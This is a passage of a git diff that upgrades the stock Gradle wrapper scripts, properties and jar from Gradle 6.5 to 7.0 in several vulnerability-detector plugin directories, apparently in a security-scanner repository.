-- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/joomla/cve20158562/gradlew.bat b/google/detectors/rce/joomla/cve20158562/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/joomla/cve20158562/gradlew.bat +++ b/google/detectors/rce/joomla/cve20158562/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/joomla/rusty_rce/gradlew b/google/detectors/rce/joomla/rusty_rce/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/joomla/rusty_rce/gradlew +++ b/google/detectors/rce/joomla/rusty_rce/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/joomla/rusty_rce/gradlew.bat b/google/detectors/rce/joomla/rusty_rce/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/joomla/rusty_rce/gradlew.bat +++ b/google/detectors/rce/joomla/rusty_rce/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradlew b/google/detectors/rce/liferay_portal/cve20207961/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/liferay_portal/cve20207961/gradlew +++ b/google/detectors/rce/liferay_portal/cve20207961/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
